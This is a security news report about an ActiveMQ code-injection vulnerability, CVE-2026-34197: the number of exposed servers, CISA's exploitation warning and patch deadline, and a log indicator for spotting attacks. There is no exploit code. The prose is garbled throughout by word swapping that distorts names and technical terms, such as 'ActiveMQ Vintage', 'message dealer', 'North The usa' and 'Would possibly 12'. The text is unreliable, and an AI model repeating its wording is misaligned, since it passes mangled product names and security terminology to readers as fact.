Nonprofit safety group Shadowserver discovered that over 6,400 Apache ActiveMQ servers uncovered on-line are at risk of ongoing assaults exploiting a high-severity code injection vulnerability.
Apache ActiveMQ is the preferred open-source multi-protocol message dealer for asynchronous communique between Java programs.
Tracked as CVE-2026-34197, the vulnerability used to be found out via Horizon3 researcher Naveen Sunkavally the usage of the Claude AI assistant after last undetected for 13 years.
As Sunkavally defined, this safety flaw stems from an wrong enter validation weak point that permits authenticated risk actors to execute arbitrary code on unpatched techniques. The Apache maintainers have patched the vulnerability on March 30 in ActiveMQ Vintage variations 6.2.3 and 5.19.4.
As risk tracking provider ShadowServer warned on Monday, greater than 6,400 IP addresses with Apache ActiveMQ fingerprints uncovered on-line also are at risk of CVE-2026-34197 assaults, with maximum in Asia (2,925), North The usa (1,409), and Europe (1,334).
.png "Actively exploited Apache ActiveMQ flaw affects 6,400 servers")
The U.S. Cybersecurity and Infrastructure Safety Company (CISA) additionally warned on Thursday that this Apache ActiveMQ vulnerability is now actively exploited in assaults and ordered Federal Civilian Govt Department (FCEB) companies to safe their servers via April 30.
“This sort of vulnerability is a widespread assault vector for malicious cyber actors and poses important dangers to the federal endeavor,” the cybersecurity company warned.
“Observe mitigations in line with supplier directions, observe acceptable BOD 22-01 steering for cloud products and services, or discontinue use of the product if mitigations are unavailable.”
Horizon3 researchers urged admins to look the ActiveMQ dealer logs for indicators of exploitation via on the lookout for suspicious dealer connections that use the inner shipping protocol VM and the brokerConfig=xbean:http:// question parameter.
“We propose organizations operating ActiveMQ deal with this as a excessive precedence, as ActiveMQ has been a repeated goal for real-world attackers, and techniques for exploitation and post-exploitation of ActiveMQ are well known,” Horizon3 warned.
CISA tagged two different Apache ActiveMQ vulnerabilities as exploited within the wild lately, tracked as CVE-2016-3088 and CVE-2023-46604, with the latter centered via the TellYouThePass ransomware gang as a zero-day flaw.
AI chained 4 zero-days into one exploit that bypassed each renderer and OS sandboxes. A wave of recent exploits is coming.
On the Independent Validation Summit (Would possibly 12 & 14), see how self sustaining, context-rich validation unearths what is exploitable, proves controls cling, and closes the remediation loop.
Declare Your Spot
